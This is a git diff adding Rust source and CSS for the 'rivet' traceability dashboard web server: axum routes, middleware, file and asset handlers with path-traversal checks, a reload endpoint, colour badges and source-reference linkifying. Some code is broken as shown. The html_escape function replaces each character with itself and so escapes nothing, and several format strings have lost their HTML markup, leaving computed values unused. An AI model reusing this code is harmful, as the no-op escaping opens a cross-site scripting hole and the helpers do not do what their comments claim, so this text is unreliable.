.route("/stats", get(views::stats_view)) + .route("/coverage", get(views::coverage_view)) + .route("/documents", get(views::documents_list)) + .route("/documents/{id}", get(views::document_detail)) + .route("/search", get(views::search_view)) + .route("/verification", get(views::verification_view)) + .route("/stpa", get(views::stpa_view)) + .route("/results", get(views::results_view)) + .route("/results/{run_id}", get(views::result_detail)) + .route("/source", get(views::source_tree_view)) + .route("/source/{*path}", get(views::source_file_view)) + .route("/source-raw/{*path}", get(source_raw)) + .route("/diff", get(views::diff_view)) + .route("/doc-linkage", get(views::doc_linkage_view)) + .route("/traceability", get(views::traceability_view)) + .route("/traceability/history", get(views::traceability_history)) + .route("/api/links/{id}", get(api_artifact_links)) + .route("/wasm/{*path}", get(wasm_asset)) + .route("/help", get(views::help_view)) + .route("/help/docs", get(views::help_docs_list)) + .route("/help/docs/{*slug}", get(views::help_docs_topic)) + .route("/help/schema", get(views::help_schema_list)) + .route("/help/schema/{name}", get(views::help_schema_show)) + .route("/help/links", get(views::help_links_view)) + .route("/help/rules", get(views::help_rules_view)) + .route("/docs-asset/{*path}", get(docs_asset)) + .route("/reload", post(reload_handler)) + .with_state(state.clone()) + .layer(axum::middleware::from_fn_with_state(state, wrap_full_page)); + + let addr = format!("0.0.0.0:{port}"); + eprintln!("rivet dashboard listening on http://localhost:{port}"); + + let listener = tokio::net::TcpListener::bind(&addr).await?; + axum::serve(listener, app).await?; + Ok(()) +} + +/// Middleware: for direct browser requests (no HX-Request header) to view routes, +/// wrap the handler's partial HTML in the full page layout. 
This replaces the old +/// `/?goto=` redirect pattern and fixes query-param loss, hash-fragment loss, and +/// the async replaceState race condition. +async fn wrap_full_page( + State(state): State, + req: axum::extract::Request, + next: axum::middleware::Next, +) -> axum::response::Response { + let path = req.uri().path().to_string(); + let query = req.uri().query().unwrap_or("").to_string(); + let is_htmx = req.headers().contains_key("hx-request"); + let is_print = query.contains("print=1") || query.contains("print=true"); + let method = req.method().clone(); + + let response = next.run(req).await; + + // Only wrap GET requests to view routes (not /, assets, or APIs) + if method == axum::http::Method::GET + && !is_htmx + && path != "/" + && !path.starts_with("/api/") + && !path.starts_with("/wasm/") + && !path.starts_with("/source-raw/") + && !path.starts_with("/docs-asset/") + { + let bytes = axum::body::to_bytes(response.into_body(), 16 * 1024 * 1024) + .await + .unwrap_or_default(); + let content = String::from_utf8_lossy(&bytes); + let app = state.read().await; + if is_print { + return layout::print_layout(&content, &app).into_response(); + } + return page_layout(&content, &app).into_response(); + } + + response +} + +/// GET /api/links/{id} — return JSON array of AADL-prefixed artifact IDs linked +/// to the given artifact (forward links, backlinks, and self if applicable). 
+async fn api_artifact_links( + State(state): State, + Path(id): Path, +) -> axum::Json> { + let state = state.read().await; + let graph = &state.graph; + + let mut linked_ids = Vec::new(); + + // Forward links from this artifact + for link in graph.links_from(&id) { + if link.target.starts_with("AADL-") { + linked_ids.push(link.target.clone()); + } + } + + // Backlinks to this artifact + for bl in graph.backlinks_to(&id) { + if bl.source.starts_with("AADL-") { + linked_ids.push(bl.source.clone()); + } + } + + // If this IS an AADL artifact, include self + if id.starts_with("AADL-") { + linked_ids.push(id); + } + + axum::Json(linked_ids) +} + +/// GET /source-raw/{*path} — serve a project file as raw text (for WASM client-side rendering). +async fn source_raw( + State(state): State, + Path(raw_path): Path, +) -> impl IntoResponse { + let state = state.read().await; + let project_path = &state.project_path_buf; + let decoded = urlencoding::decode(&raw_path).unwrap_or(std::borrow::Cow::Borrowed(&raw_path)); + let rel_path = decoded.as_ref(); + + let full_path = project_path.join(rel_path); + let canonical = match full_path.canonicalize() { + Ok(p) => p, + Err(_) => { + return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(); + } + }; + let canonical_project = match project_path.canonicalize() { + Ok(p) => p, + Err(_) => { + return (axum::http::StatusCode::INTERNAL_SERVER_ERROR, "error").into_response(); + } + }; + if !canonical.starts_with(&canonical_project) { + return (axum::http::StatusCode::FORBIDDEN, "forbidden").into_response(); + } + + let metadata = match std::fs::symlink_metadata(&full_path) { + Ok(m) => m, + Err(_) => return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), + }; + + // Directory: return JSON listing of filenames. 
+ if metadata.is_dir() { + let mut entries = Vec::new(); + if let Ok(dir) = std::fs::read_dir(&full_path) { + for entry in dir.flatten() { + if let Some(name) = entry.file_name().to_str() { + entries.push(name.to_string()); + } + } + } + entries.sort(); + let json = serde_json::to_string(&entries).unwrap_or_else(|_| "[]".into()); + return ( + axum::http::StatusCode::OK, + [(axum::http::header::CONTENT_TYPE, "application/json")], + json, + ) + .into_response(); + } + + match std::fs::read_to_string(&full_path) { + Ok(content) => ( + axum::http::StatusCode::OK, + [( + axum::http::header::CONTENT_TYPE, + "text/plain; charset=utf-8", + )], + content, + ) + .into_response(), + Err(_) => (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), + } +} + +/// GET /wasm/{*path} — serve jco-transpiled WASM assets for browser-side rendering. +async fn wasm_asset(Path(path): Path) -> impl IntoResponse { + let content_type = if path.ends_with(".js") { + "application/javascript" + } else if path.ends_with(".wasm") { + "application/wasm" + } else if path.ends_with(".d.ts") { + "application/typescript" + } else { + "application/octet-stream" + }; + + // Try embedded assets first (when built with embed-wasm feature). + #[cfg(feature = "embed-wasm")] + { + let bytes: Option<&[u8]> = match path.as_str() { + "spar_wasm.js" => Some(embedded_wasm::SPAR_JS.as_bytes()), + "spar_wasm.core.wasm" => Some(embedded_wasm::CORE_WASM), + "spar_wasm.core2.wasm" => Some(embedded_wasm::CORE2_WASM), + "spar_wasm.core3.wasm" => Some(embedded_wasm::CORE3_WASM), + _ => None, + }; + if let Some(data) = bytes { + return ( + axum::http::StatusCode::OK, + [ + (axum::http::header::CONTENT_TYPE, content_type), + (axum::http::header::CACHE_CONTROL, "public, max-age=86400"), + ], + data.to_vec(), + ) + .into_response(); + } + } + + // Fallback to filesystem (development mode). + // Try the workspace assets dir first, then next to the binary. 
+ let candidates = [ + std::env::current_dir() + .unwrap_or_default() + .join("rivet-cli/assets/wasm/js") + .join(&path), + std::env::current_exe() + .unwrap_or_default() + .parent() + .unwrap_or(std::path::Path::new(".")) + .join("assets/wasm/js") + .join(&path), + ]; + + for candidate in &candidates { + if let Ok(bytes) = std::fs::read(candidate) { + return ( + axum::http::StatusCode::OK, + [ + (axum::http::header::CONTENT_TYPE, content_type), + (axum::http::header::CACHE_CONTROL, "no-cache"), + ], + bytes, + ) + .into_response(); + } + } + + ( + axum::http::StatusCode::NOT_FOUND, + [(axum::http::header::CONTENT_TYPE, "text/plain")], + format!("WASM asset not found: {path}").into_bytes(), + ) + .into_response() +} + +/// POST /reload — re-read the project from disk and replace the shared state. +/// +/// Uses the `HX-Current-URL` header (sent automatically by HTMX) to redirect +/// back to the current page after reload, preserving the user's position. +async fn reload_handler( + State(state): State, + headers: axum::http::HeaderMap, +) -> impl IntoResponse { + let (project_path, schemas_dir, port) = { + let guard = state.read().await; + ( + guard.project_path_buf.clone(), + guard.schemas_dir.clone(), + guard.context.port, + ) + }; + + match reload_state(&project_path, &schemas_dir, port) { + Ok(new_state) => { + let mut guard = state.write().await; + *guard = new_state; + + // Redirect back to wherever the user was (HTMX sends HX-Current-URL). + // Extract the path portion from the full URL (e.g. "http://localhost:3001/documents/DOC-001" → "/documents/DOC-001"). + // Navigate back to wherever the user was (HTMX sends HX-Current-URL). + // HX-Location does a client-side HTMX navigation (fetch + swap + push-url). 
+ let redirect_url = headers + .get("HX-Current-URL") + .and_then(|v| v.to_str().ok()) + .and_then(|full_url| { + full_url + .find("://") + .and_then(|i| full_url[i + 3..].find('/')) + .map(|j| { + let start = full_url.find("://").unwrap() + 3 + j; + full_url[start..].to_owned() + }) + }) + .unwrap_or_else(|| "/".to_owned()); + + let location_json = format!( + "{{\"path\":\"{}\",\"target\":\"#content\"}}", + redirect_url.replace('"', "\\\"") + ); + + ( + axum::http::StatusCode::OK, + [("HX-Location", location_json)], + "reloaded".to_owned(), + ) + } + Err(e) => { + eprintln!("reload error: {e:#}"); + ( + axum::http::StatusCode::INTERNAL_SERVER_ERROR, + [( + "HX-Location", + "{\"path\":\"/\",\"target\":\"#content\"}".to_owned(), + )], + format!("reload failed: {e}"), + ) + } + } +} + +/// GET /docs-asset/{*path} — serve static files (images, SVG, etc.) from docs directories. +async fn docs_asset( + State(state): State, + Path(path): Path, +) -> impl IntoResponse { + let state = state.read().await; + + // Sanitize: reject path traversal + if path.contains("..") { + return ( + axum::http::StatusCode::BAD_REQUEST, + [("Content-Type", "text/plain")], + Vec::new(), + ); + } + + // Search through all doc directories for the requested file + for dir in &state.doc_dirs { + let file_path = dir.join(&path); + if file_path.is_file() + && let Ok(bytes) = std::fs::read(&file_path) + { + let content_type = match file_path.extension().and_then(|e| e.to_str()).unwrap_or("") { + "png" => "image/png", + "jpg" | "jpeg" => "image/jpeg", + "gif" => "image/gif", + "svg" => "image/svg+xml", + "webp" => "image/webp", + "pdf" => "application/pdf", + _ => "application/octet-stream", + }; + return ( + axum::http::StatusCode::OK, + [("Content-Type", content_type)], + bytes, + ); + } + } + + ( + axum::http::StatusCode::NOT_FOUND, + [("Content-Type", "text/plain")], + b"not found".to_vec(), + ) +} + +// ── Color palette ──────────────────────────────────────────────────────── + +pub(crate) fn 
type_color_map() -> HashMap { + let pairs: &[(&str, &str)] = &[ + // STPA + ("loss", "#dc3545"), + ("hazard", "#fd7e14"), + ("system-constraint", "#20c997"), + ("controller", "#6f42c1"), + ("uca", "#e83e8c"), + ("control-action", "#17a2b8"), + ("feedback", "#6610f2"), + ("causal-factor", "#d63384"), + ("safety-constraint", "#20c997"), + ("loss-scenario", "#e83e8c"), + ("controller-constraint", "#20c997"), + ("controlled-process", "#6610f2"), + ("sub-hazard", "#fd7e14"), + // ASPICE + ("stakeholder-req", "#0d6efd"), + ("system-req", "#0dcaf0"), + ("system-architecture", "#198754"), + ("sw-req", "#198754"), + ("sw-architecture", "#0d6efd"), + ("sw-detailed-design", "#6610f2"), + ("sw-unit", "#6f42c1"), + ("system-verification", "#6610f2"), + ("sw-verification", "#6610f2"), + ("system-integration-verification", "#6610f2"), + ("sw-integration-verification", "#6610f2"), + ("sw-unit-verification", "#6610f2"), + ("qualification-verification", "#6610f2"), + // Dev + ("requirement", "#0d6efd"), + ("design-decision", "#198754"), + ("feature", "#6f42c1"), + // Cybersecurity + ("asset", "#ffc107"), + ("threat", "#dc3545"), + ("cybersecurity-req", "#fd7e14"), + ("vulnerability", "#e83e8c"), + ("attack-path", "#dc3545"), + ("cybersecurity-goal", "#0d6efd"), + ("cybersecurity-control", "#198754"), + ("security-verification", "#6610f2"), + ("risk-assessment", "#fd7e14"), + ("security-event", "#e83e8c"), + ]; + pairs + .iter() + .map(|(k, v)| (k.to_string(), v.to_string())) + .collect() +} + +/// Return a colored badge `` for an artifact type. +/// +/// Uses the `type_color_map` hex color as text and computes a 12%-opacity +/// tinted background from it. 
+pub(crate) fn badge_for_type(type_name: &str) -> String { + let colors = type_color_map(); + let hex = colors + .get(type_name) + .map(|s| s.as_str()) + .unwrap_or("#5b2d9e"); + // Parse hex → rgb + let hex_digits = hex.trim_start_matches('#'); + let r = u8::from_str_radix(&hex_digits[0..2], 16).unwrap_or(91); + let g = u8::from_str_radix(&hex_digits[2..4], 16).unwrap_or(45); + let b = u8::from_str_radix(&hex_digits[4..6], 16).unwrap_or(158); + format!( + "{}", + html_escape(type_name) + ) +} + +// ── HTML helpers ───────────────────────────────────────────────────────── + +pub(crate) fn html_escape(s: &str) -> String { + s.replace('&', "&") + .replace('<', "<") + .replace('>', ">") + .replace('"', """) +} + +/// Rewrite relative image `src` paths to serve through `/docs-asset/`. +/// Leaves absolute URLs (http://, https://, //) unchanged. +pub(crate) fn rewrite_image_paths(html: &str) -> String { + let mut result = String::with_capacity(html.len()); + let mut rest = html; + while let Some(pos) = rest.find("src=\"") { + result.push_str(&rest[..pos]); + let after_src = &rest[pos + 5..]; // after src=" + if let Some(end) = after_src.find('"') { + let path = &after_src[..end]; + result.push_str("src=\""); + if path.starts_with("http://") + || path.starts_with("https://") + || path.starts_with("//") + || path.starts_with('/') + { + result.push_str(path); + } else { + result.push_str("/docs-asset/"); + result.push_str(path); + } + result.push('"'); + rest = &after_src[end + 1..]; + } else { + result.push_str("src=\""); + rest = after_src; + } + } + result.push_str(rest); + result +} + +/// Turn `path/to/file.rs:42` patterns into clickable `/source/path/to/file.rs#L42` links. +/// Also handles ranges like `file.rs:10-20` and plain `path/to/file.rs` (no line). 
// NOTE(review): `encoded_path` is computed but never interpolated below —
// the three format strings almost certainly lost their
// `<a href="/source/{encoded_path}#L{line}">…</a>` markup when
// angle-bracketed spans were stripped in transcription. Restore from
// repository history before shipping; as written this emits plain text.
+pub(crate) fn linkify_source_refs(s: &str) -> String {
+ // Regex-free: scan for patterns like word/word.ext:digits or word/word.ext:digits-digits
+ let mut result = String::new();
+ let src = s;
+ let mut pos = 0usize;
+
+ while pos < src.len() {
+ // Look for file-like patterns: contains '/' or '.' and optionally ':digits'
+ if let Some(m) = find_source_ref(&src[pos..]) {
// Copy the text before the match verbatim, then emit the
// (link-)formatted reference.
+ result.push_str(&src[pos..pos + m.start]);
+ let file_path = &m.file;
+ let encoded_path = urlencoding::encode(file_path);
+ if let Some(line) = m.line {
+ if let Some(end_line) = m.end_line {
+ result.push_str(&format!(
+ "{file_path}:{line}-{end_line}"
+ ));
+ } else {
+ result.push_str(&format!(
+ "{file_path}:{line}"
+ ));
+ }
+ } else {
+ result.push_str(&format!(
+ "{file_path}"
+ ));
+ }
+ pos += m.start + m.len;
+ } else {
// No further match: copy the remainder and stop scanning.
+ result.push_str(&src[pos..]);
+ break;
+ }
+ }
+ result
+}
+
// Offsets (`start`, `len`) are byte positions relative to the slice handed
// to `find_source_ref`, not to the whole input string.
// NOTE(review): `Option` fields were presumably `Option<u32>` — the generic
// arguments were stripped in transcription; confirm upstream.
+struct SourceRefMatch {
+ start: usize,
+ len: usize,
+ file: String,
+ line: Option,
+ end_line: Option,
+}
+
+/// Find the next source-ref pattern in text: `some/path.ext:line` or `some/path.ext:line-line`
+/// File must contain a `/` or `.` with a recognized extension.
+fn find_source_ref(s: &str) -> Option {
+ let extensions = [
+ ".rs", ".yaml", ".yml", ".toml", ".md", ".py", ".js", ".ts", ".tsx", ".jsx", ".c", ".h",
+ ".cpp", ".hpp", ".go", ".java", ".rb", ".sh", ".json", ".xml", ".aadl",
+ ];
+ let len = s.len();
+ let mut i = 0;
+ while i < len {
+ // Try to match a file path starting at position i
+ // A file path: sequence of [a-zA-Z0-9_/.\-] containing at least one '/' and ending with a known extension
+ let start = i;
+ let mut j = i;
+ let mut has_slash = false;
+ let mut has_ext = false;
+ while j < len {
+ let c = s.as_bytes()[j];
// The path-character test continues on the next transcribed line.
+ if c.is_ascii_alphanumeric() || c == b'_' || c == b'/' || c == b'.'
// (Continuation of the path-character test split above.)
|| c == b'-' {
+ if c == b'/' {
+ has_slash = true;
+ }
+ j += 1;
+ } else {
+ break;
+ }
+ }
// Require at least one '/' and a minimum length of three bytes before
// considering the run a candidate path.
+ if has_slash && j > start + 2 {
+ let candidate = &s[start..j];
+ // Check if it ends with a known extension
+ for ext in &extensions {
+ if candidate.ends_with(ext) {
+ has_ext = true;
+ break;
+ }
+ }
+ if has_ext {
+ let file = candidate.to_string();
+ // Check for :line or :line-line
+ if j < len && s.as_bytes()[j] == b':' {
+ let _colon_pos = j;
+ j += 1;
+ let line_start = j;
+ while j < len && s.as_bytes()[j].is_ascii_digit() {
+ j += 1;
+ }
+ if j > line_start {
// Zero is rejected as a line number (parse failure also maps
// to 0 via unwrap_or), falling through to the path-only case.
+ let line: u32 = s[line_start..j].parse().unwrap_or(0);
+ if line > 0 {
+ // Check for range: -digits
+ if j < len && s.as_bytes()[j] == b'-' {
+ let dash = j;
+ j += 1;
+ let end_start = j;
+ while j < len && s.as_bytes()[j].is_ascii_digit() {
+ j += 1;
+ }
+ if j > end_start {
+ let end_line: u32 = s[end_start..j].parse().unwrap_or(0);
+ if end_line > 0 {
+ return Some(SourceRefMatch {
+ start,
+ len: j - start,
+ file,
+ line: Some(line),
+ end_line: Some(end_line),
+ });
+ }
+ }
+ // Not a valid range, just use line
+ return Some(SourceRefMatch {
+ start,
+ len: dash - start,
+ file,
+ line: Some(line),
+ end_line: None,
+ });
+ }
+ return Some(SourceRefMatch {
+ start,
+ len: j - start,
+ file,
+ line: Some(line),
+ end_line: None,
+ });
+ }
+ }
+ }
+ // No line number, just file path
+ return Some(SourceRefMatch {
+ start,
+ len: j - start,
+ file,
+ line: None,
+ end_line: None,
+ });
+ }
+ }
+ i += 1;
+ }
+ None
+}
diff --git a/rivet-cli/src/serve/styles.rs b/rivet-cli/src/serve/styles.rs
new file mode 100644
index 0000000..6d45197
--- /dev/null
+++ b/rivet-cli/src/serve/styles.rs
@@ -0,0 +1,580 @@
+pub const CSS: &str = r#"
+/* ── Reset & base ─────────────────────────────────────────────── */
+*,*::before,*::after{box-sizing:border-box;margin:0;padding:0}
+:root{
+ --bg: #f5f5f7;
+ --surface:#fff;
+ --sidebar:#0f0f13;
+ --sidebar-hover:#1c1c24;
+ --sidebar-text:#9898a6;
+ --sidebar-active:#fff;
+ --text: #1d1d1f; + --text-secondary:#6e6e73; + --border: #e5e5ea; + --accent: #3a86ff; + --accent-hover:#2568d6; + --radius: 10px; + --radius-sm:6px; + --shadow: 0 1px 3px rgba(0,0,0,.06),0 1px 2px rgba(0,0,0,.04); + --shadow-md:0 4px 12px rgba(0,0,0,.06),0 1px 3px rgba(0,0,0,.04); + --mono: 'JetBrains Mono','Fira Code','SF Mono',Menlo,monospace; + --font: 'Atkinson Hyperlegible',system-ui,-apple-system,sans-serif; + --transition:180ms ease; +} +html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-rendering:optimizeLegibility} +body{font-family:var(--font);color:var(--text);background:var(--bg);line-height:1.6;font-size:15px} + +/* ── Links ────────────────────────────────────────────────────── */ +a{color:var(--accent);text-decoration:none;transition:color var(--transition)} +a:hover{color:var(--accent-hover)} +a:focus-visible{outline:2px solid var(--accent);outline-offset:2px;border-radius:3px} + +/* ── Shell layout ─────────────────────────────────────────────── */ +.shell{display:flex;min-height:100vh} +.content-area{display:flex;flex-direction:column;flex:1;min-width:0} + +/* ── Sidebar navigation ──────────────────────────────────────── */ +nav{width:232px;background:var(--sidebar);color:var(--sidebar-text); + padding:1.75rem 1rem;flex-shrink:0;display:flex;flex-direction:column; + position:sticky;top:0;height:100vh;overflow-y:auto; + border-right:1px solid rgba(255,255,255,.06)} +nav h1{font-size:1.05rem;font-weight:700;color:var(--sidebar-active); + margin-bottom:2rem;letter-spacing:.04em;padding:0 .75rem; + display:flex;align-items:center;gap:.5rem} +nav h1::before{content:'';display:inline-block;width:8px;height:8px; + border-radius:50%;background:var(--accent);flex-shrink:0} +nav ul{list-style:none;display:flex;flex-direction:column;gap:2px} +nav li{margin:0} +nav a{display:flex;align-items:center;gap:.5rem;padding:.5rem .75rem;border-radius:var(--radius-sm); + color:var(--sidebar-text);font-size:.875rem;font-weight:500; + 
transition:all var(--transition)} +nav a:hover{background:var(--sidebar-hover);color:var(--sidebar-active);text-decoration:none} +nav a.active{background:rgba(58,134,255,.08);color:var(--sidebar-active);border-left:2px solid var(--accent);padding-left:calc(.75rem - 2px)} +nav a:focus-visible{outline:2px solid var(--accent);outline-offset:-2px} + +/* ── Main content ─────────────────────────────────────────────── */ +main{flex:1;padding:2.5rem 3rem;max-width:1400px;min-width:0;overflow-y:auto} +main.htmx-swapping{opacity:.4;transition:opacity 150ms ease-out} +main.htmx-settling{opacity:1;transition:opacity 200ms ease-in} + +/* ── Loading bar ──────────────────────────────────────────────── */ +#loading-bar{position:fixed;top:0;left:0;width:0;height:2px;background:var(--accent); + z-index:9999;transition:none;pointer-events:none} +#loading-bar.active{width:85%;transition:width 8s cubic-bezier(.1,.05,.1,1)} +#loading-bar.done{width:100%;transition:width 100ms ease;opacity:0;transition:width 100ms ease,opacity 300ms ease 100ms} + +/* ── Typography ───────────────────────────────────────────────── */ +h2{font-size:1.4rem;font-weight:700;margin-bottom:1.25rem;color:var(--text);letter-spacing:-.01em;padding-bottom:.75rem;border-bottom:1px solid var(--border)} +h3{font-size:1.05rem;font-weight:600;margin:1.5rem 0 .75rem;color:var(--text)} +code,pre{font-family:var(--mono);font-size:.85em} +pre{background:#f1f1f3;padding:1rem;border-radius:var(--radius-sm);overflow-x:auto} + +/* ── Tables ───────────────────────────────────────────────────── */ +table{width:100%;border-collapse:collapse;margin-bottom:1.5rem;font-size:.9rem} +th,td{text-align:left;padding:.65rem .875rem} +th{font-weight:600;font-size:.75rem;text-transform:uppercase;letter-spacing:.06em; + color:var(--text-secondary);border-bottom:2px solid var(--border);background:transparent} +td{border-bottom:1px solid var(--border)} +tbody tr{transition:background var(--transition)} +tbody 
tr:nth-child(even){background:rgba(0,0,0,.015)} +tbody tr:hover{background:rgba(58,134,255,.04)} +.tbl-filter-wrap{margin-bottom:.5rem} +.tbl-filter{width:100%;max-width:20rem;padding:.4rem .65rem;font-size:.85rem;font-family:var(--mono); + border:1px solid var(--border);border-radius:5px;background:var(--surface);color:var(--text); + outline:none;transition:border-color var(--transition)} +.tbl-filter:focus{border-color:var(--accent)} +.tbl-sort-arrow{font-size:.7rem;opacity:.6;margin-left:.25rem} +th:hover .tbl-sort-arrow{opacity:1} +td a{font-family:var(--mono);font-size:.85rem;font-weight:500} + +/* ── Badges ───────────────────────────────────────────────────── */ +.badge{display:inline-flex;align-items:center;padding:.2rem .55rem;border-radius:5px; + font-size:.73rem;font-weight:600;letter-spacing:.02em;line-height:1.4;white-space:nowrap} +.badge-error{background:#fee;color:#c62828} +.badge-warn{background:#fff8e1;color:#8b6914} +.badge-info{background:#e8f4fd;color:#0c5a82} +.badge-ok{background:#e6f9ed;color:#15713a} +.badge-type{background:#f0ecf9;color:#5b2d9e;font-family:var(--mono);font-size:.72rem} + +/* ── Validation bar ──────────────────────────────────────────── */ +.validation-bar{padding:1rem 1.25rem;border-radius:var(--radius);margin-bottom:1.25rem;font-weight:600;font-size:.95rem} +.validation-bar.pass{background:linear-gradient(135deg,#e6f9ed,#d4f5e0);color:#15713a;border:1px solid #b8e8c8} +.validation-bar.fail{background:linear-gradient(135deg,#fee,#fdd);color:#c62828;border:1px solid #f4c7c3} + +/* ── Status progress bars ────────────────────────────────────── */ +.status-bar-row{display:flex;align-items:center;gap:.75rem;margin-bottom:.5rem;font-size:.85rem} +.status-bar-label{width:80px;text-align:right;font-weight:500;color:var(--text-secondary)} +.status-bar-track{flex:1;height:20px;background:#e5e5ea;border-radius:4px;overflow:hidden;position:relative} +.status-bar-fill{height:100%;border-radius:4px;transition:width .3s ease} 
+.status-bar-count{width:40px;font-variant-numeric:tabular-nums;color:var(--text-secondary)} + +/* ── Cards ────────────────────────────────────────────────────── */ +.card{background:var(--surface);border-radius:var(--radius);padding:1.5rem; + margin-bottom:1.25rem;box-shadow:var(--shadow);border:1px solid var(--border); + transition:box-shadow var(--transition)} + +/* ── Stat grid ────────────────────────────────────────────────── */ +.stat-grid{display:grid;grid-template-columns:repeat(auto-fill,minmax(160px,1fr));gap:1rem;margin-bottom:1.75rem} +.stat-box{background:var(--surface);border-radius:var(--radius);padding:1.25rem 1rem;text-align:center; + box-shadow:var(--shadow);border:1px solid var(--border);transition:box-shadow var(--transition),transform var(--transition); + border-top:3px solid var(--border)} +.stat-box:hover{box-shadow:var(--shadow-md);transform:translateY(-1px)} +.stat-box .number{font-size:2rem;font-weight:800;letter-spacing:-.02em; + font-variant-numeric:tabular-nums;line-height:1.2} +.stat-box .label{font-size:.8rem;font-weight:500;color:var(--text-secondary);margin-top:.25rem; + text-transform:uppercase;letter-spacing:.04em} +.stat-blue{border-top-color:#3a86ff}.stat-blue .number{color:#3a86ff} +.stat-green{border-top-color:#15713a}.stat-green .number{color:#15713a} +.stat-orange{border-top-color:#e67e22}.stat-orange .number{color:#e67e22} +.stat-red{border-top-color:#c62828}.stat-red .number{color:#c62828} +.stat-amber{border-top-color:#b8860b}.stat-amber .number{color:#b8860b} +.stat-purple{border-top-color:#6f42c1}.stat-purple .number{color:#6f42c1} + +/* ── Link pills ───────────────────────────────────────────────── */ +.link-pill{display:inline-block;padding:.15rem .45rem;border-radius:4px; + font-size:.76rem;font-family:var(--mono);background:#f0f0f3; + color:var(--text-secondary);margin:.1rem;font-weight:500} + +/* ── Forms ────────────────────────────────────────────────────── */ 
+.form-row{display:flex;gap:1rem;align-items:end;flex-wrap:wrap;margin-bottom:1rem} +.form-row label{font-size:.8rem;font-weight:600;color:var(--text-secondary); + text-transform:uppercase;letter-spacing:.04em} +.form-row select,.form-row input[type="text"],.form-row input[type="search"], +.form-row input:not([type]),.form-row input[list]{ + padding:.5rem .75rem;border:1px solid var(--border);border-radius:var(--radius-sm); + font-size:.875rem;font-family:var(--font);background:var(--surface);color:var(--text); + transition:border-color var(--transition),box-shadow var(--transition);appearance:none; + -webkit-appearance:none} +.form-row select{padding-right:2rem;background-image:url("data:image/svg+xml,%3Csvg width='10' height='6' viewBox='0 0 10 6' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M1 1l4 4 4-4' stroke='%236e6e73' stroke-width='1.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3C/svg%3E"); + background-repeat:no-repeat;background-position:right .75rem center} +.form-row input:focus,.form-row select:focus{ + outline:none;border-color:var(--accent);box-shadow:0 0 0 3px rgba(58,134,255,.15)} +.form-row input[type="range"]{padding:0;border:none;accent-color:var(--accent);width:100%} +.form-row input[type="range"]:focus{box-shadow:none} +.form-row button{padding:.5rem 1.25rem;background:var(--accent);color:#fff;border:none; + border-radius:var(--radius-sm);font-size:.875rem;font-weight:600; + font-family:var(--font);cursor:pointer;transition:all var(--transition); + box-shadow:0 1px 2px rgba(0,0,0,.08)} +.form-row button:hover{background:var(--accent-hover);box-shadow:0 2px 6px rgba(58,134,255,.25);transform:translateY(-1px)} +.form-row button:active{transform:translateY(0)} +.form-row button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} + +/* ── Definition lists ─────────────────────────────────────────── */ +dl{margin:.75rem 0} +dt{font-weight:600;font-size:.8rem;color:var(--text-secondary);margin-top:.75rem; + 
text-transform:uppercase;letter-spacing:.04em} +dd{margin-left:0;margin-bottom:.25rem;margin-top:.2rem} + +/* ── Meta text ────────────────────────────────────────────────── */ +.meta{color:var(--text-secondary);font-size:.85rem} + +/* ── Nav icons & badges ───────────────────────────────────────── */ +.nav-icon{display:inline-flex;width:1.25rem;height:1.25rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.5} +nav a:hover .nav-icon,nav a.active .nav-icon{opacity:.9} +.nav-label{display:flex;align-items:center;gap:.5rem;flex:1;min-width:0} +.nav-badge{font-size:.65rem;font-weight:700;padding:.1rem .4rem;border-radius:4px; + background:rgba(255,255,255,.08);color:rgba(255,255,255,.4);margin-left:auto;flex-shrink:0} +.nav-badge-error{background:rgba(220,53,69,.2);color:#ff6b7a} +nav .nav-divider{height:1px;background:rgba(255,255,255,.06);margin:.75rem .75rem} + +/* ── Context bar ─────────────────────────────────────────────── */ +.context-bar{display:flex;align-items:center;gap:.75rem;padding:.5rem 1.5rem; + background:var(--surface);border-bottom:1px solid var(--border);font-size:.78rem;color:var(--text-secondary); + flex-wrap:wrap} +.context-bar .ctx-project{font-weight:700;color:var(--text);font-size:.82rem} +.context-bar .ctx-sep{opacity:.25} +.context-bar .ctx-git{font-family:var(--mono);font-size:.72rem;padding:.15rem .4rem;border-radius:4px; + background:rgba(58,134,255,.08);color:var(--accent)} +.context-bar .ctx-dirty{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; + background:rgba(220,53,69,.1);color:#c62828} +.context-bar .ctx-clean{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; + background:rgba(21,113,58,.1);color:#15713a} +.context-bar .ctx-time{margin-left:auto;opacity:.6} +.ctx-switcher{position:relative;display:inline-flex;align-items:center} +.ctx-switcher-details{position:relative} +.ctx-switcher-details 
summary{cursor:pointer;list-style:none;display:inline-flex;align-items:center; + padding:.15rem .35rem;border-radius:4px;opacity:.5;transition:opacity .15s} +.ctx-switcher-details summary:hover{opacity:1;background:rgba(255,255,255,.06)} +.ctx-switcher-details summary::-webkit-details-marker{display:none} +.ctx-switcher-dropdown{position:absolute;top:100%;left:0;z-index:100;margin-top:.35rem; + background:var(--surface);border:1px solid var(--border);border-radius:var(--radius-sm); + padding:.5rem;min-width:280px;box-shadow:0 8px 24px rgba(0,0,0,.35)} +.ctx-switcher-item{padding:.5rem .65rem;border-radius:4px} +.ctx-switcher-item:hover{background:rgba(255,255,255,.04)} +.ctx-switcher-item .ctx-switcher-name{display:block;font-weight:600;font-size:.8rem;color:var(--text);margin-bottom:.2rem} +.ctx-switcher-item .ctx-switcher-cmd{display:block;font-size:.7rem;color:var(--text-secondary); + padding:.2rem .4rem;background:rgba(255,255,255,.04);border-radius:3px; + font-family:var(--mono);user-select:all;cursor:text} + +/* ── Footer ──────────────────────────────────────────────────── */ +.footer{padding:2rem 0 1rem;text-align:center;font-size:.75rem;color:var(--text-secondary); + border-top:1px solid var(--border);margin-top:3rem} + +/* ── Verification ────────────────────────────────────────────── */ +.ver-level{margin-bottom:1.5rem} +.ver-level-header{display:flex;align-items:center;gap:.75rem;margin-bottom:.75rem} +.ver-level-title{font-size:1rem;font-weight:600;color:var(--text)} +.ver-level-arrow{color:var(--text-secondary);font-size:.85rem} +details.ver-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); + 